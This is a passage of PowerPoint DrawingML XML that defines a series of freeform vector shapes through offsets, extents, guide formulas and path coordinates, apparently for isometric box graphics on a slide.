                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="76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0" name="Freeform 1701"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-4425" y="-6566"/>
                <a:ext cx="283" cy="359"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 283 w 283"/>
                  <a:gd name="T1" fmla="*/ 359 h 359"/>
                  <a:gd name="T2" fmla="*/ 283 w 283"/>
                  <a:gd name="T3" fmla="*/ 78 h 359"/>
                  <a:gd name="T4" fmla="*/ 0 w 283"/>
                  <a:gd name="T5" fmla="*/ 0 h 359"/>
                  <a:gd name="T6" fmla="*/ 0 w 283"/>
                  <a:gd name="T7" fmla="*/ 284 h 359"/>
                  <a:gd name="T8" fmla="*/ 283 w 283"/>
                  <a:gd name="T9" fmla="*/ 359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3" h="359">
                    <a:moveTo>
                      <a:pt x="283" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="283" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="359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1" name="Freeform 1702"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-4142" y="-6497"/>
                <a:ext cx="36" cy="290"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 36"/>
                  <a:gd name="T1" fmla="*/ 0 h 290"/>
                  <a:gd name="T2" fmla="*/ 36 w 36"/>
                  <a:gd name="T3" fmla="*/ 283 h 290"/>
                  <a:gd name="T4" fmla="*/ 0 w 36"/>
                  <a:gd name="T5" fmla="*/ 290 h 290"/>
                  <a:gd name="T6" fmla="*/ 0 w 36"/>
                  <a:gd name="T7" fmla="*/ 9 h 290"/>
                  <a:gd name="T8" fmla="*/ 36 w 36"/>
                  <a:gd name="T9" fmla="*/ 0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90">
                    <a:moveTo>
                      <a:pt x="36" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9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2" name="Freeform 1703"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1834" y="-5890"/>
                <a:ext cx="319" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 319 w 319"/>
                  <a:gd name="T1" fmla="*/ 76 h 85"/>
                  <a:gd name="T2" fmla="*/ 33 w 319"/>
                  <a:gd name="T3" fmla="*/ 0 h 85"/>
                  <a:gd name="T4" fmla="*/ 0 w 319"/>
                  <a:gd name="T5" fmla="*/ 7 h 85"/>
                  <a:gd name="T6" fmla="*/ 286 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 319 w 319"/>
                  <a:gd name="T9" fmla="*/ 7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9" h="85">
                    <a:moveTo>
                      <a:pt x="319" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="76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3" name="Freeform 1704"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1834" y="-5883"/>
                <a:ext cx="286" cy="359"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 286 w 286"/>
                  <a:gd name="T1" fmla="*/ 359 h 359"/>
                  <a:gd name="T2" fmla="*/ 286 w 286"/>
                  <a:gd name="T3" fmla="*/ 78 h 359"/>
                  <a:gd name="T4" fmla="*/ 0 w 286"/>
                  <a:gd name="T5" fmla="*/ 0 h 359"/>
                  <a:gd name="T6" fmla="*/ 0 w 286"/>
                  <a:gd name="T7" fmla="*/ 284 h 359"/>
                  <a:gd name="T8" fmla="*/ 286 w 286"/>
                  <a:gd name="T9" fmla="*/ 359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6" h="359">
                    <a:moveTo>
                      <a:pt x="286" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="286" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="359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4" name="Freeform 1705"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1548" y="-5814"/>
                <a:ext cx="33" cy="290"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 33 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 290"/>
                  <a:gd name="T2" fmla="*/ 33 w 33"/>
                  <a:gd name="T3" fmla="*/ 283 h 290"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 290 h 290"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 9 h 290"/>
                  <a:gd name="T8" fmla="*/ 33 w 33"/>
                  <a:gd name="T9" fmla="*/ 0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90">
                    <a:moveTo>
                      <a:pt x="33" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9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5" name="Freeform 1706"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1437" y="-5784"/>
                <a:ext cx="319" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 319 w 319"/>
                  <a:gd name="T1" fmla="*/ 76 h 85"/>
                  <a:gd name="T2" fmla="*/ 33 w 319"/>
                  <a:gd name="T3" fmla="*/ 0 h 85"/>
                  <a:gd name="T4" fmla="*/ 0 w 319"/>
                  <a:gd name="T5" fmla="*/ 7 h 85"/>
                  <a:gd name="T6" fmla="*/ 283 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 319 w 319"/>
                  <a:gd name="T9" fmla="*/ 7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9" h="85">
                    <a:moveTo>
                      <a:pt x="319" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="76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6" name="Freeform 1707"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1437" y="-5777"/>
                <a:ext cx="283" cy="359"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 283 w 283"/>
                  <a:gd name="T1" fmla="*/ 359 h 359"/>
                  <a:gd name="T2" fmla="*/ 283 w 283"/>
                  <a:gd name="T3" fmla="*/ 78 h 359"/>
                  <a:gd name="T4" fmla="*/ 0 w 283"/>
                  <a:gd name="T5" fmla="*/ 0 h 359"/>
                  <a:gd name="T6" fmla="*/ 0 w 283"/>
                  <a:gd name="T7" fmla="*/ 284 h 359"/>
                  <a:gd name="T8" fmla="*/ 283 w 283"/>
                  <a:gd name="T9" fmla="*/ 359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3" h="359">
                    <a:moveTo>
                      <a:pt x="283" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="283" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="359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7" name="Freeform 1708"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1154" y="-5708"/>
                <a:ext cx="36" cy="290"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 36"/>
                  <a:gd name="T1" fmla="*/ 0 h 290"/>
                  <a:gd name="T2" fmla="*/ 36 w 36"/>
                  <a:gd name="T3" fmla="*/ 283 h 290"/>
                  <a:gd name="T4" fmla="*/ 0 w 36"/>
                  <a:gd name="T5" fmla="*/ 290 h 290"/>
                  <a:gd name="T6" fmla="*/ 0 w 36"/>
                  <a:gd name="T7" fmla="*/ 9 h 290"/>
                  <a:gd name="T8" fmla="*/ 36 w 36"/>
                  <a:gd name="T9" fmla="*/ 0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90">
                    <a:moveTo>
                      <a:pt x="36" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9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8" name="Freeform 1709"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-627" y="-4827"/>
                <a:ext cx="319" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 76 h 85"/>
                  <a:gd name="T2" fmla="*/ 286 w 319"/>
                  <a:gd name="T3" fmla="*/ 0 h 85"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 7 h 85"/>
                  <a:gd name="T6" fmla="*/ 33 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 7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9" h="85">
                    <a:moveTo>
                      <a:pt x="0" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="286" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="85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9" name="Freeform 1710"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-594" y="-4820"/>
                <a:ext cx="286" cy="362"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 286"/>
                  <a:gd name="T1" fmla="*/ 362 h 362"/>
                  <a:gd name="T2" fmla="*/ 0 w 286"/>
                  <a:gd name="T3" fmla="*/ 78 h 362"/>
                  <a:gd name="T4" fmla="*/ 286 w 286"/>
                  <a:gd name="T5" fmla="*/ 0 h 362"/>
                  <a:gd name="T6" fmla="*/ 286 w 286"/>
                  <a:gd name="T7" fmla="*/ 284 h 362"/>
                  <a:gd name="T8" fmla="*/ 0 w 286"/>
                  <a:gd name="T9" fmla="*/ 362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6" h="362">
                    <a:moveTo>
                      <a:pt x="0" y="362"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362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0" name="Freeform 1711"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-627" y="-4751"/>
                <a:ext cx="33" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 293"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 283 h 293"/>
                  <a:gd name="T4" fmla="*/ 33 w 33"/>
                  <a:gd name="T5" fmla="*/ 293 h 293"/>
                  <a:gd name="T6" fmla="*/ 33 w 33"/>
                  <a:gd name="T7" fmla="*/ 9 h 293"/>
                  <a:gd name="T8" fmla="*/ 0 w 33"/>
                  <a:gd name="T9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93">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33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1" name="Freeform 1712"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1804" y="-5479"/>
                <a:ext cx="319" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 76 h 85"/>
                  <a:gd name="T2" fmla="*/ 283 w 319"/>
                  <a:gd name="T3" fmla="*/ 0 h 85"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 7 h 85"/>
                  <a:gd name="T6" fmla="*/ 33 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 85"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 7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9" h="85">
                    <a:moveTo>
                      <a:pt x="0" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="283" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="85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2" name="Freeform 1713"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1837" y="-5472"/>
                <a:ext cx="286" cy="359"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 286"/>
                  <a:gd name="T1" fmla="*/ 359 h 359"/>
                  <a:gd name="T2" fmla="*/ 0 w 286"/>
                  <a:gd name="T3" fmla="*/ 78 h 359"/>
                  <a:gd name="T4" fmla="*/ 286 w 286"/>
                  <a:gd name="T5" fmla="*/ 0 h 359"/>
                  <a:gd name="T6" fmla="*/ 286 w 286"/>
                  <a:gd name="T7" fmla="*/ 284 h 359"/>
                  <a:gd name="T8" fmla="*/ 0 w 286"/>
                  <a:gd name="T9" fmla="*/ 359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6" h="359">
                    <a:moveTo>
                      <a:pt x="0" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="359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3" name="Freeform 1714"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1804" y="-5403"/>
                <a:ext cx="33" cy="290"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 290"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 283 h 290"/>
                  <a:gd name="T4" fmla="*/ 33 w 33"/>
                  <a:gd name="T5" fmla="*/ 290 h 290"/>
                  <a:gd name="T6" fmla="*/ 33 w 33"/>
                  <a:gd name="T7" fmla="*/ 9 h 290"/>
                  <a:gd name="T8" fmla="*/ 0 w 33"/>
                  <a:gd name="T9" fmla="*/ 0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90">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33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A71B4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4" name="Freeform 1715"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-4942" y="-5066"/>
                <a:ext cx="4072" cy="1562"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4072"/>
                  <a:gd name="T1" fmla="*/ 0 h 1562"/>
                  <a:gd name="T2" fmla="*/ 0 w 4072"/>
                  <a:gd name="T3" fmla="*/ 468 h 1562"/>
                  <a:gd name="T4" fmla="*/ 4072 w 4072"/>
                  <a:gd name="T5" fmla="*/ 1562 h 1562"/>
                  <a:gd name="T6" fmla="*/ 4072 w 4072"/>
                  <a:gd name="T7" fmla="*/ 1092 h 1562"/>
                  <a:gd name="T8" fmla="*/ 0 w 4072"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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72" h="1562">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4072" y="1562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4072" y="10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5" name="Freeform 1716"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-199" y="-5810"/>
                <a:ext cx="1906" cy="2705"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1906 w 1906"/>
                  <a:gd name="T1" fmla="*/ 0 h 2705"/>
                  <a:gd name="T2" fmla="*/ 0 w 1906"/>
                  <a:gd name="T3" fmla="*/ 515 h 2705"/>
                  <a:gd name="T4" fmla="*/ 0 w 1906"/>
                  <a:gd name="T5" fmla="*/ 2705 h 2705"/>
                  <a:gd name="T6" fmla="*/ 1906 w 1906"/>
                  <a:gd name="T7" fmla="*/ 2190 h 2705"/>
                  <a:gd name="T8" fmla="*/ 1906 w 1906"/>
                  <a:gd name="T9" fmla="*/ 0 h 2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06" h="2705">
                    <a:moveTo>
                      <a:pt x="1906" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1906" y="2190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1906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6" name="Freeform 1717"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-870" y="-4815"/>
                <a:ext cx="3139" cy="1311"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3139"/>
                  <a:gd name="T1" fmla="*/ 1311 h 1311"/>
                  <a:gd name="T2" fmla="*/ 0 w 3139"/>
                  <a:gd name="T3" fmla="*/ 841 h 1311"/>
                  <a:gd name="T4" fmla="*/ 3139 w 3139"/>
                  <a:gd name="T5" fmla="*/ 0 h 1311"/>
                  <a:gd name="T6" fmla="*/ 3139 w 3139"/>
                  <a:gd name="T7" fmla="*/ 468 h 1311"/>
                  <a:gd name="T8" fmla="*/ 0 w 3139"/>
                  <a:gd name="T9" fmla="*/ 1311 h 1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39" h="1311">
                    <a:moveTo>
                      <a:pt x="0" y="1311"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3139" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1311"/>
                    </a:ln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7" name="Line 1718"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="753" y="-5552"/>
                <a:ext cx="0" cy="219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8" name="Freeform 1719"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="828" y="-4621"/>
                <a:ext cx="126" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 126"/>
                  <a:gd name="T1" fmla="*/ 30 h 33"/>
                  <a:gd name="T2" fmla="*/ 111 w 126"/>
                  <a:gd name="T3" fmla="*/ 0 h 33"/>
                  <a:gd name="T4" fmla="*/ 126 w 126"/>
                  <a:gd name="T5" fmla="*/ 4 h 33"/>
                  <a:gd name="T6" fmla="*/ 12 w 126"/>
                  <a:gd name="T7" fmla="*/ 33 h 33"/>
                  <a:gd name="T8" fmla="*/ 0 w 126"/>
                  <a:gd name="T9" fmla="*/ 3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33">
                    <a:moveTo>
                      <a:pt x="0" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="111" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="33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9" name="Freeform 1720"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="840" y="-4617"/>
                <a:ext cx="114" cy="140"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 114"/>
                  <a:gd name="T1" fmla="*/ 140 h 140"/>
                  <a:gd name="T2" fmla="*/ 0 w 114"/>
                  <a:gd name="T3" fmla="*/ 29 h 140"/>
                  <a:gd name="T4" fmla="*/ 114 w 114"/>
                  <a:gd name="T5" fmla="*/ 0 h 140"/>
                  <a:gd name="T6" fmla="*/ 114 w 114"/>
                  <a:gd name="T7" fmla="*/ 109 h 140"/>
                  <a:gd name="T8" fmla="*/ 0 w 114"/>
                  <a:gd name="T9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" h="140">
                    <a:moveTo>
                      <a:pt x="0" y="140"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14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0" name="Freeform 1721"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="828" y="-4591"/>
                <a:ext cx="12" cy="114"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 12"/>
                  <a:gd name="T1" fmla="*/ 0 h 114"/>
                  <a:gd name="T2" fmla="*/ 0 w 12"/>
                  <a:gd name="T3" fmla="*/ 111 h 114"/>
                  <a:gd name="T4" fmla="*/ 12 w 12"/>
                  <a:gd name="T5" fmla="*/ 114 h 114"/>
                  <a:gd name="T6" fmla="*/ 12 w 12"/>
                  <a:gd name="T7" fmla="*/ 3 h 114"/>
                  <a:gd name="T8" fmla="*/ 0 w 12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4">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1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1" name="Freeform 1722"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="550" y="-4541"/>
                <a:ext cx="125" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 125"/>
                  <a:gd name="T1" fmla="*/ 31 h 33"/>
                  <a:gd name="T2" fmla="*/ 111 w 125"/>
                  <a:gd name="T3" fmla="*/ 0 h 33"/>
                  <a:gd name="T4" fmla="*/ 125 w 125"/>
                  <a:gd name="T5" fmla="*/ 5 h 33"/>
                  <a:gd name="T6" fmla="*/ 11 w 125"/>
                  <a:gd name="T7" fmla="*/ 33 h 33"/>
                  <a:gd name="T8" fmla="*/ 0 w 125"/>
                  <a:gd name="T9" fmla="*/ 3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" h="33">
                    <a:moveTo>
                      <a:pt x="0" y="31"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="111" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="33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2" name="Freeform 1723"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="561" y="-4536"/>
                <a:ext cx="114" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 114"/>
                  <a:gd name="T1" fmla="*/ 139 h 139"/>
                  <a:gd name="T2" fmla="*/ 0 w 114"/>
                  <a:gd name="T3" fmla="*/ 28 h 139"/>
                  <a:gd name="T4" fmla="*/ 114 w 114"/>
                  <a:gd name="T5" fmla="*/ 0 h 139"/>
                  <a:gd name="T6" fmla="*/ 114 w 114"/>
                  <a:gd name="T7" fmla="*/ 108 h 139"/>
                  <a:gd name="T8" fmla="*/ 0 w 114"/>
                  <a:gd name="T9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" h="139">
                    <a:moveTo>
                      <a:pt x="0" y="139"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="108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3" name="Freeform 1724"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="550" y="-4510"/>
                <a:ext cx="11" cy="113"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 11"/>
                  <a:gd name="T1" fmla="*/ 0 h 113"/>
                  <a:gd name="T2" fmla="*/ 0 w 11"/>
                  <a:gd name="T3" fmla="*/ 111 h 113"/>
                  <a:gd name="T4" fmla="*/ 11 w 11"/>
                  <a:gd name="T5" fmla="*/ 113 h 113"/>
                  <a:gd name="T6" fmla="*/ 11 w 11"/>
                  <a:gd name="T7" fmla="*/ 2 h 113"/>
                  <a:gd name="T8" fmla="*/ 0 w 11"/>
                  <a:gd name="T9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3">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1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4" name="Freeform 1725"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-582" y="-2980"/>
                <a:ext cx="227" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 227"/>
